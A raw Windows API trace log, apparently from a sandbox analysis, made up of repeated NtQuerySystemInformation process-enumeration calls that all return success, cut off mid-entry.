[0145.119] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a330) returned 0x0 [0145.119] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a330) returned 0x0 [0145.120] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a330) returned 0x0 [0145.121] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a330) returned 0x0 [0145.122] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a330) returned 0x0 [0145.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a330) returned 0x0 [0145.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a330) returned 0x0 [0145.128] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a330) returned 0x0 [0145.129] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a330) returned 0x0 [0145.129] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a330) returned 0x0 [0145.130] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a330) returned 0x0 [0145.131] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a330) returned 0x0 [0145.136] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a330) returned 0x0 [0145.137] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a330) returned 0x0 [0145.137] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a330) returned 0x0 [0145.138] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a330) returned 0x0 [0145.139] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a330) returned 0x0 [0145.139] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a330) returned 0x0 [0145.140] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a330) returned 0x0 [0145.145] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a330) returned 0x0 [0145.145] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a330) returned 0x0 [0145.146] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a330) returned 0x0 [0145.147] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a330) returned 0x0 [0145.148] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a330) returned 0x0 [0145.148] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a330) returned 0x0 [0145.149] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a330) returned 0x0 [0145.174] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.175] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.176] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.177] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.177] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.178] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.179] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.183] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.184] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.186] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.187] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.188] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.192] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.193] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.193] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.194] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.195] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.196] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.200] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.201] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.201] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.202] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.203] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.203] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.204] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.205] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.227] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.228] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.229] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.230] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.230] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.231] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.236] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.237] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.237] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.238] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.239] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.239] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.240] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.244] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.245] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.246] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.247] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.247] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.248] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.249] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.249] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.254] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.254] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.255] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.256] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.257] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.257] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.258] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.291] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.295] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.296] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.296] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.302] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.302] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.303] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.304] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.305] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.305] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.310] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.311] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.311] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.313] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.313] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.319] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.319] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.320] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.321] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.321] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.322] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.323] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1a2f0) returned 0x0 [0145.536] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19f30) returned 0x0 [0145.537] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19f30) returned 0x0 [0145.538] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19f30) returned 0x0 [0145.539] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19f30) returned 0x0 [0145.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19f30) returned 0x0 [0145.541] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19f30) returned 0x0 [0145.542] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19f30) returned 0x0 [0145.549] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19f30) returned 0x0 [0145.550] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19f30) returned 0x0 [0145.551] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19f30) returned 0x0 [0145.552] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19f30) returned 0x0 [0145.553] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19f30) returned 0x0 [0145.553] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19f30) returned 0x0 [0145.554] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19f30) returned 0x0 [0145.555] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19f30) returned 0x0 [0145.561] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19f30) returned 0x0 [0145.561] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19f30) returned 0x0 [0145.562] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19f30) returned 0x0 [0145.563] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19f30) returned 0x0 [0145.563] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19f30) returned 0x0 [0145.564] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x19f30) returned 0x0 [0145.587] NtQuerySystemInformation (in: 